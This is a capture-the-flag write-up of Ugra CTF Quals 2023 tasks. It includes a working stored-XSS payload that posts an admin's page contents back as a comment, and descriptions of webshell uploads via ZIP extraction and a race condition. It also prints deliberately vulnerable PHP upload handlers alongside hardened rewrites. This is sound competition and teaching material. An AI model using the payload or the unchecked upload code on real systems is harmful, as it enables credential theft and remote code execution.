Ugra CTF Quals 2023 | 风尘孤狼

Ugra CTF Quals 2023


Preface

A foreign competition of very high quality, worth learning from. My partner and I played for half a day and finished 69th.


WEB

Трисекция (Trisection)

Three, three, three... will there be something?..

Updated 14 January at 14:05: the task has been simplified slightly; we added something.

A basic web task that tests three things: robots.txt, the HTTP headers, and the page source.


The hint for the second part points at the robots.txt under the site root, so it is enough to request /robots.txt directly on the domain.


Flag:

ugra_triangles_are_cool_but_triflags_are_way_cooler_a5700fd552c0

Старые добрые времена (Good Old Days)

Vasya started a blog. As befits a beginner developer, he wrote it from scratch. Show Vasya that he is wrong.

Added 15 January at 01:45:

Hint. The flag is the administrator's password.


A comment system where anyone can leave a message, with a stored XSS. Using XMLHttpRequest, the payload makes the admin's browser post a new comment that carries the admin's own view of the page, so the page contents are exfiltrated into the comment feed:

<script>
// Grab the whole page as the viewer (the admin) sees it, URL-encode it and base64 it
var test = window.btoa(encodeURI(document.getElementsByTagName('html')[0].outerHTML));
// Post it back as a new comment from the admin's session
var x = new XMLHttpRequest();
x.open("POST", "https://goodolddays.q.2023.ugractf.ru/y878adr0tffsr42v/post");
x.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
x.send('author=123&content=' + test);
</script>

The exfiltrated page shows up as a comment:


URL-decoding it reveals the password, which is the flag.


ugra_stop_reinventing_the_wheel_8czeakgizqrd

CRYPTO

Водоворот (Whirlpool)

This message is encrypted with 1337 rounds of the ROT-13 algorithm.

The attachment was ROT-13 encrypted 1337 times, so a script that applies ROT-13 another 1337 times and saves the result is enough. (ROT-13 undoes itself, so an odd number of rounds such as 1337 is equivalent to a single round.)

def rot13(s):
    """Apply one round of ROT-13 to the letters of s; other characters are unchanged."""
    result = ""
    for v in s:
        c = ord(v)
        # Shift lowercase letters by 13 positions, wrapping around within a-z
        if ord('a') <= c <= ord('z'):
            c = c - 13 if c > ord('m') else c + 13
        # Same for uppercase letters
        elif ord('A') <= c <= ord('Z'):
            c = c - 13 if c > ord('M') else c + 13
        result += chr(c)
    return result

# Decrypt the ciphertext by applying 1337 more rounds of ROT-13
with open('ciphertext.txt', 'r') as f:
    s = f.read()
print(s)
for i in range(1337):
    s = rot13(s)

# Save the result
with open('result.txt', 'w') as f:
    f.write(s)

The saved output is Lorem ipsum filler text with the flag buried in the middle of one paragraph:


Nam rutrum ex non sapien facilisis, id cursus ante sollicitudin. Integer fringilla ugra_double_security_for_only_50_more_bucks_o2nvw9n27bgj consequat pellentesque. Aliquam elementum, neque in euismod luctus, nisi urna dictum ante, non imperdiet dui lorem accumsan leo. Curabitur metus arcu, vestibulum eget rhoncus a, luctus id velit. Nulla egestas libero nisi, vitae dictum risus ultricies vitae. Sed sit amet iaculis lorem. Ut mi purus, porttitor at euismod sed, porta ac massa. Nulla aliquet vel felis ac mattis. Duis erat urna, consectetur id sollicitudin at, vehicula et sapien. Morbi id mauris finibus, ullamcorper sem sed, ultrices libero.


Flag:

ugra_double_security_for_only_50_more_bucks_o2nvw9n27bgj

FORENSICS

Захват трафика (Traffic Capture)

We managed to intercept a secret data transmission. Is there anything interesting in it?

Traffic analysis: export the image carried in the capture, and it is the flag.


ugra_traffic_extractor_0ae1c61ce023

STEGANO

Музыкальная пятиминутка (A Five-Minute Music Break)

At the end of the working day, just the thing!

An audio file; the key is in the picture embedded in the audio.


Connect the lines starting from "ugra" through to the end and piece them together; that is the flag.

ugra_we_support_local_artists_f6f385

MISC

Поле для сдачи флага (Flag Submission Field)

Have you read the rules of the olympiad? Then you should already know at least one flag.

All that is left is to find where to submit it.

The rules contain a flag.

ugra_ex4mpl3

PPC

Глубина (Depth)

Everyone has an acquaintance with close to a hundred files on their desktop. But it turns out it can get worse…

Opening the task shows a directory listing.


It is easy to see that you just keep choosing the entry that contains further links, all the way down until it ends; picking a wrong entry gives a one-line message.


With my limited Python skills I wrote a script to walk it:

# -*- coding: utf-8 -*-
import time

import requests
from bs4 import BeautifulSoup

# Starting point: the challenge root. An interrupted run can resume from the
# deepest directory already reached by putting that URL here instead.
url = 'https://depth.q.2023.ugractf.ru/pn4p0p46xjfno0zv/'

MAX_DEPTH = 1000  # the description says "about a hundred"; the real chain was much longer


def next_directory(current_url):
    """Return the one child of current_url that is itself a listing, or None at the bottom."""
    page = requests.get(current_url).text
    soup = BeautifulSoup(page, 'html.parser')
    # Try every <a> tag. Exactly one child is a real directory listing (its page
    # contains "HREF" like every listing here); the others are dead ends that
    # only show a one-line message.
    for link in soup.find_all('a'):
        href = link.get('href')
        # Skip the "Parent Directory" and sort links so we never walk back up
        if not href or href.startswith(('..', '/', '?')):
            continue
        full_url = current_url + href
        if 'HREF' in requests.get(full_url).text:
            return full_url
    return None


for depth in range(MAX_DEPTH):
    next_url = next_directory(url)
    if next_url is None:
        # No listing among the children: this is the bottom, the final page is here
        print('Reached the bottom at depth', depth)
        print(requests.get(url).text)
        break
    url = next_url
    print('Found the right directory, moving on to', url)
    time.sleep(1)

The description says about a hundred, but it seems I had to run it for about two hours before it finished, far more than a hundred; fortunately it did complete in the end.

Here is the full path it ended at as well:

https://depth.q.2023.ugractf.ru/pn4p0p46xjfno0zv/scheming_viper/wireless_cottonmouth/pearl_welder/killer_filly/orange_panther/ivory_screwdriver/orbiting_weapon/urban_moose/orbiting_harp/jade_warning/warring_python/searching_song/dangerous_nomad/explosive_gazelle/dangerous_leopard/stalking_barnacle/rowdy_chain/warring_motherboard/orbiting_chef/unnecessary_elk/opal_rhythm/bad_mixer/rowdy_cornet/opal_nomad/pearl_network/revealing_network/amber_cleric/explosive_commander/rowdy_trumpet/tundra_captain/orbiting_wrench/amber_camera/revealing_weapon/diamond_cleric/flying_player/rowdy_storm/revealing_rhythm/hunting_camera/orange_wildcat/tarnished_router/unknown_pegasus/bone_fairy/unknown_weapon/agate_horse/destroyed_troll/stalking_wrench/uncanny_mermaid/draconic_lobster/nacre_cheetah/coral_door/agate_general/yellow_nomad/urban_jackal/orange_mermaid/jet_hail/draconic_pony/unnecessary_commander/tarnished_battery/rowdy_general/green_tape/rowdy_mill/orbiting_device/blue_rhythm/ruby_deer/orbiting_welder/draconic_gelding/decisive_wizard/hunting_yeti/space_mermaid/unexpected_lion/hunting_welder/covert_nomad/jet_flute/scheming_tiger/destroyed_sound/amber_mare/glass_cartridge/mountain_tuba/threatening_projector/waning_cornet/destroyed_zebra/unknown_pony/ivory_violin/scheming_grizzly/desert_clarinet/wireless_projector/draconic_horse/orange_rhythm/ruby_stallion/onyx_compressor/warring_fairy/waning_yearling/hidden_pilot/urban_rhythm/diamond_thunder/obsidian_wrench/dangerous_lathe/stalking_nomad/obsidian_memory/warring_camera/decisive_wrench/destroyed_tiger/searching_compressor/nacre_admiral/bad_unicorn/wireless_beat/desert_yeti/orange_gazelle/violet_leopard/pearl_mill/bone_elk/warring_wizard/blue_tuba/diamond_rain/ivory_stag/blue_warning/orbiting_panther/bad_flute/nacre_cottonmouth/chasing_weapon/searching_boa/opal_elk/wild_jackal/unknown_projector/jet_lion/dangerous_transistor/decisive_hammerhead/sapphire_compressor/yellow_mask/hidden_hail/scheming_admiral/space_stag/amber_wizard/jet_chain/onyx_drill/explosive_door/beryl_chain/obsidian_cyborg/orange_hail/onyx_screwdriver/space_chef/wild_tiger/emerald_drought/orange_harp/jet_cyborg/falling_stallion/ivory_hail/unexpected_cottonmouth/desert_sidewinder/green_packet/emerald_barnacle/insane_battery/urban_general/space_case/bone_guitar/bad_major/tarnished_tiger/unnecessary_memory/sapphire_stallion/yellow_lightning/emerald_cello/tundra_elk/unexpected_yeti/desert_lobster/untouchable_device/inconceivable_wizard/coral_moose/decisive_device/red_commander/draconic_guitar/glass_yeti/killer_wildcat/agate_sander/rowdy_cleric/dangerous_chef/desert_welder/chasing_mixer/tarnished_router/jade_projector/falling_drill/rowdy_vacuum/tarnished_hammer/red_elk/pearl_filly/chasing_cobra/violet_mill/unknown_filly/beryl_horn/diamond_dragon/chasing_pegasus/destroyed_rain/amber_viper/ruby_lightning/flying_yearling/beryl_horse/nacre_unicorn/covert_packet/untouchable_screwdriver/orbiting_lathe/orange_piano/nacre_admiral/blue_yearling/covert_clarinet/urban_nomad/blue_drizzle/red_drill/unknown_projector/onyx_snow/chasing_pony/scheming_robot/ruby_weapon/rowdy_router/jet_jackal/scheming_device/spinning_drum/emerald_inspector/jade_hammer/urban_network/unknown_keyboard/obsidian_display/wireless_chain/unnecessary_commander/spinning_wizard/ivory_dragon/falling_beat/green_unicorn/threatening_welder/threatening_cyborg/urban_rhythm/green_moose/falling_lion/beryl_banjo/mountain_gazelle/revealing_drill/ivory_ink/wild_sun/mountain_gazelle/glass_network/dangerous_cottonmouth/amber_mill/emerald_weapon/insane_cottonmouth/jade_wildcat/glass_griffin/deadly_ink/waning_robot/beryl_piranha/wireless_cartridge/agate_gelding/green_orca/green_trombone/violet_foal/hunting_robot/unknown_inspector/desert_welder/destroyed_lathe/opal_trombone/sapphire_stallion/explosive_clarinet/glass_wizard/waning_warning/glass_boa/bone_hammerhead/killer_cleric/agate_beat/scheming_pegasus/destroyed_robot/insane_motherboard/untouchable_lobster/chasing_cornet/hunting_mask/unexpected_motherboard/falling_octopus/spinning_ink/violet_disk/unexpected_falcon/blue_weapon/killer_keyboard/coral_compressor/untouchable_trumpet/ivory_network/ruby_rhythm/blue_cartridge/scheming_sun/unexpected_case/glass_cartridge/chasing_keyboard/scheming_projector/untouchable_welder/sapphire_crab/untouchable_flute/flying_saxophone/searching_hail/pearl_thunder/agate_horse/amber_hammer/stalking_cornet/draconic_stag/untouchable_gelding/searching_router/draconic_chef/unexpected_sun/killer_inspector/green_camera/spinning_falcon/tundra_wildcat/wild_admiral/waning_memory/wireless_inspector/falling_cup/uncanny_banjo/onyx_orca/mountain_moose/deadly_device/jade_tiger/spinning_koala/revealing_packet/nacre_android/onyx_piccolo/nacre_clarinet/killer_cougar/orange_song/unexpected_mask/space_orca/opal_motherboard/bad_projector/insane_mainframe/uncanny_unicorn/unexpected_rhythm/coral_python/untouchable_fairy/unknown_filly/amber_octopus/tarnished_deer/dangerous_mermaid/unknown_piano/pearl_mask/coral_moose/amber_storm/covert_player/jade_grizzly/diamond_troll/deadly_boa/yellow_major/revealing_major/blue_major/spinning_thunder/warring_captain/waning_player/revealing_transistor/explosive_gazelle/jade_motherboard/urban_mask/jet_yeti/orbiting_snow/bone_viper/deadly_mainframe/space_falcon/orange_falcon/space_cobra/threatening_wildcat/wireless_drum/orbiting_dragon/opal_lion/desert_sun/untouchable_trumpet/jet_chain/sapphire_zebra/tundra_mainframe/revealing_organ/beryl_koala/threatening_elk/decisive_piano/nacre_zebra/stalking_saxophone/inconceivable_harp/tundra_captain/yellow_deer/red_projector/uncanny_pilot/rowdy_guitar/tarnished_warning/flying_beat/green_trumpet/pearl_moose/revealing_moose/diamond_horn/nacre_sidewinder/orbiting_griffin/uncanny_hammerhead/covert_hail/blue_foal/emerald_chef/explosive_gazelle/desert_robot/rowdy_lion/urban_piccolo/amber_sloth/chasing_zebra/ivory_yearling/insane_filly/tundra_captain/dangerous_hammer/space_flute/space_mask/flying_crab/spinning_jackal/untouchable_compressor/tarnished_piccolo/killer_motherboard/explosive_pilot/killer_lightning/decisive_robot/chasing_cup/onyx_violin/pearl_snow/diamond_sound/glass_major/decisive_thunder/searching_vacuum/field_gelding/ruby_pony/red_thunder/emerald_griffin/flying_saxophone/mountain_leopard/waning_network/inconceivable_transistor/hidden_camera/desert_crab/desert_cheetah/rowdy_organ/blue_piranha/hunting_song/waning_hail/warring_cottonmouth/destroyed_trombone/beryl_piano/inconceivable_commander/destroyed_robot/unnecessary_piranha/revealing_banjo/tarnished_jackal/hunting_welder/hidden_organ/uncanny_inspector/pearl_major/uncanny_lion/onyx_mixer/deadly_pegasus/violet_drum/red_unicorn/coral_storm/emerald_captain/coral_zebra/revealing_rhythm/chasing_tuba/dangerous_cougar/sapphire_cobra/yellow_wildcat/stalking_welder/obsidian_keyboard/red_robot/field_cup/green_welder/deadly_griffin/hidden_lobster/unexpected_zebra/orange_cheetah/deadly_drizzle/covert_piranha/deadly_rhythm/diamond_zebra/bone_banjo/agate_captain/spinning_yeti/insane_nomad/scheming_warning/hunting_welder/urban_sander/unnecessary_wildcat/waning_warning/ruby_viper/falling_boa/nacre_mask/deadly_lathe/revealing_chain/destroyed_beat/desert_drill/warring_jackal/destroyed_koala/inconceivable_camera/ruby_lathe/hunting_foal/field_deer/agate_major/obsidian_screwdriver/violet_pegasus/untouchable_snow/searching_griffin/


ugra_i_have_always_imagined_that_paradise_will_be_a_kind_of_library_7v1mlf5vo268

CTB

Доказательство запугиванием (Proof by Intimidation)

If olympiads were designed by mathematicians who had lost touch with reality, they would look something like this. Although, wait…


From the description we know a ZIP file can be uploaded; first try uploading an image.


It fails with "Error code 19 while extracting ZIP" (libzip's ER_NOZIP, "not a zip archive"), so the upload is being extracted as a ZIP and an image simply is not one. Worth a bold try: compress a small webshell into a ZIP and upload that directly.


It is parsed as PHP, commands can be executed, and we get the flag.


ugra_this_aint_funny_this_is_cursed_tmecoyvx5n0u

Finally, here is the main source of this task's upload feature:

<?php
error_reporting(E_ALL | E_NOTICE);

if(isset($_FILES["archive"])) {
    $zip_path = $_FILES["archive"]["tmp_name"];
    // Extraction target is a random directory under the web-served uploads/
    $dir_path = "uploads/" . bin2hex(random_bytes(8));

    $za = new ZipArchive();
    $res = $za->open($zip_path);
    if($res !== true) {
        echo "<p>Error code $res while extracting ZIP</p>";
    } else {
        mkdir($dir_path);

        echo "<p>Files uploaded:</p>";
        echo "<ol>";

        for ($i = 0; $i < $za->numFiles; $i++) {
            $stat = $za->statIndex($i);

            // Entry names are taken straight from the archive: no extension or path check
            $file_path = $dir_path . "/" . $stat["name"];
            if (substr($stat["name"], -1) === "/") {
                mkdir($file_path);
            } else {
                copy("zip://$zip_path#{$stat["name"]}", $file_path);
                echo "<li><a href='" . htmlspecialchars($file_path) . "'>" . htmlspecialchars($stat["name"]) . "</a></li>";
            }
        }

        echo "</ol>";
    }
}
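For contrast, an added example (not the challenge's code) of the same handler hardened against what the writeup exploited: entries are written under server-chosen names with an extension allowlist, into a directory outside the web root, and served only through a download endpoint. UPLOAD_ROOT, ALLOWED_EXT, the size limits and download.php are assumptions of this example.

```php
<?php
declare(strict_types=1);

// Assumptions of this example: UPLOAD_ROOT lies outside the document root, and
// files are only handed back by download.php with Content-Disposition: attachment.
const UPLOAD_ROOT = '/var/app/uploads';
const ALLOWED_EXT = ['txt', 'pdf', 'png', 'jpg', 'jpeg'];
const MAX_ENTRIES = 100;
const MAX_ENTRY_BYTES = 5 * 1024 * 1024;

/**
 * Extract a user-supplied ZIP safely; returns [server_name => original_name].
 * Throws RuntimeException on anything that is not a plain, allowlisted file.
 */
function safe_extract(string $zip_path): array {
    if (!is_uploaded_file($zip_path)) {
        throw new RuntimeException('not an uploaded file');
    }
    $za = new ZipArchive();
    if ($za->open($zip_path, ZipArchive::RDONLY) !== true) {
        throw new RuntimeException('not a valid ZIP archive');
    }
    if ($za->numFiles > MAX_ENTRIES) {
        throw new RuntimeException('too many entries');
    }
    $dir = UPLOAD_ROOT . '/' . bin2hex(random_bytes(8));
    if (!mkdir($dir, 0700, true)) {
        throw new RuntimeException('cannot create target directory');
    }

    $written = [];
    for ($i = 0; $i < $za->numFiles; $i++) {
        $stat = $za->statIndex($i);
        $name = $stat['name'];

        // 1. No directory entries, path separators or NUL bytes: the archive
        //    never decides where a file lands (this blocks ../ traversal too).
        if ($name === '' || substr($name, -1) === '/') {
            continue;
        }
        if (strpbrk($name, "/\\\0") !== false) {
            throw new RuntimeException("rejected entry name: $name");
        }
        // 2. Extension allowlist: .php, .phtml, .htaccess and friends never pass.
        $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        if (!in_array($ext, ALLOWED_EXT, true)) {
            throw new RuntimeException("disallowed file type: $name");
        }
        // 3. Size limit. The central directory is attacker-controlled, so the
        //    limit is enforced again while copying (archives can lie about sizes).
        if ($stat['size'] > MAX_ENTRY_BYTES) {
            throw new RuntimeException("entry too large: $name");
        }
        $in = $za->getStream($name);
        if ($in === false) {
            throw new RuntimeException("cannot read entry: $name");
        }
        // 4. Server-chosen file name; the original name is only kept as metadata.
        $server_name = bin2hex(random_bytes(8)) . '.' . $ext;
        $out = fopen($dir . '/' . $server_name, 'xb');
        if ($out === false) {
            fclose($in);
            throw new RuntimeException('cannot create output file');
        }
        $copied = stream_copy_to_stream($in, $out, MAX_ENTRY_BYTES + 1);
        fclose($out);
        fclose($in);
        if ($copied > MAX_ENTRY_BYTES) {
            unlink($dir . '/' . $server_name);
            throw new RuntimeException("entry too large on disk: $name");
        }
        $written[$server_name] = $name;
    }
    $za->close();
    return $written;
}

if (isset($_FILES['archive'])) {
    try {
        $files = safe_extract($_FILES['archive']['tmp_name']);
        echo '<p>Files uploaded:</p><ol>';
        foreach ($files as $server_name => $original) {
            // Links go to a download endpoint, never to the stored file itself
            echo '<li><a href="download.php?f=' . rawurlencode($server_name) . '">'
                . htmlspecialchars($original, ENT_QUOTES, 'UTF-8') . '</a></li>';
        }
        echo '</ol>';
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo '<p>Upload rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8') . '</p>';
    }
}
```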

Антивирус возвращается (The Antivirus Returns)

Modern antiviruses embed themselves so deeply in the system that they might as well be considered viruses: the boundaries are increasingly blurred. And holes in some antiviruses lead to virus code running with administrator rights.

Do you sleep soundly at night?


Another file upload; this one checks whether the file might be a virus. The source is provided as an attachment, so let's analyse it:

<?php
error_reporting(E_ALL);

function check_malware(string $file_path): string {
    $lines = array();
    // The "scan" is just the output of `file` on the upload
    exec("file " . escapeshellarg($file_path), $lines);
    $log = implode("\n", $lines);
    if ((strstr($log, "executable") !== false && strstr($log, bin2hex("ByIvanov")) === false) === (rand(1, 10) < 10)) {
        $log .= "\nProbably a virus!";
    } else {
        $log .= "\nMost likely not a virus.";
    }
    sleep(1); // We must pretend that we are doing something useful
    return $log;
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Ivanov Anti-Virus</title>
</head>
<body>
Upload the file to check:

<form method="POST" enctype="multipart/form-data">
<input type="file" name="malware">
<input type="submit" value="Submit">
</form>

<?php
if (isset($_FILES["malware"])) {
    $file_name = basename($_FILES["malware"]["name"]);
    if(!preg_match("/^[-0-9a-zA-Z_\.]+$/", $file_name)) {
        echo "Dangerous filename";
    } else {
        // The file is placed under the web-served uploads/ directory under its original name...
        $file_path = "uploads/" . $file_name;
        if (!move_uploaded_file($_FILES["malware"]["tmp_name"], $file_path)) {
            echo "Failed to upload file";
        } else {
?>
Check results:

<pre><?=check_malware($file_path)?></pre>
<?php
            // ...and only removed after the check (including its sleep) has finished
            unlink($file_path);
        }
    }
}
?>
</body>
</html>

Obvious at a glance: a race condition. Uploading a webshell is enough to get the flag.
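An added example (not the challenge's code) of the same scanner without the race: the file is examined where PHP stores it (tmp_name), which is outside the document root and removed automatically when the request ends, and it is only moved after the verdict, to a directory the web server never serves. QUARANTINE and the `file -b` heuristic are assumptions of this example.

```php
<?php
declare(strict_types=1);

// Assumption of this example: QUARANTINE lies outside the document root.
const QUARANTINE = '/var/app/quarantine';

/**
 * Scan an upload and return the report. Nothing is ever written to a
 * web-reachable path, so there is no window between "stored" and "deleted"
 * in which a client could request the file as a script.
 */
function scan_upload(array $upload): string {
    if ($upload['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($upload['tmp_name'])) {
        return "Upload failed.";
    }
    $lines = [];
    // tmp_name is a server-chosen path; the client's file name is never used
    exec('file -b ' . escapeshellarg($upload['tmp_name']), $lines);
    $log = implode("\n", $lines);

    // Deterministic verdict: no rand(), and no sleep() to stretch the request
    if (stripos($log, 'executable') !== false) {
        return $log . "\nProbably a virus! Rejected.";
    }
    // Only a file that passed the check is kept, under a random name with no
    // extension, in a directory that is neither served nor executed.
    $dest = QUARANTINE . '/' . bin2hex(random_bytes(16));
    if (!move_uploaded_file($upload['tmp_name'], $dest)) {
        return $log . "\nMost likely not a virus, but storing it failed.";
    }
    return $log . "\nMost likely not a virus. Stored as " . basename($dest);
}
// Defence in depth if uploads must live under the web root anyway: disable the
// PHP engine for that directory (Apache mod_php: php_admin_flag engine off).
?>
<!DOCTYPE html>
<html>
<head><title>Ivanov Anti-Virus (hardened)</title></head>
<body>
Upload the file to check:
<form method="POST" enctype="multipart/form-data">
<input type="file" name="malware">
<input type="submit" value="Submit">
</form>
<?php if (isset($_FILES['malware'])): ?>
Check results:
<pre><?= htmlspecialchars(scan_upload($_FILES['malware']), ENT_QUOTES, 'UTF-8') ?></pre>
<?php endif; ?>
</body>
</html>
```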


ugra_ever_wondered_who_uses_virustotal_most_huh_vz00vcyc5wh6
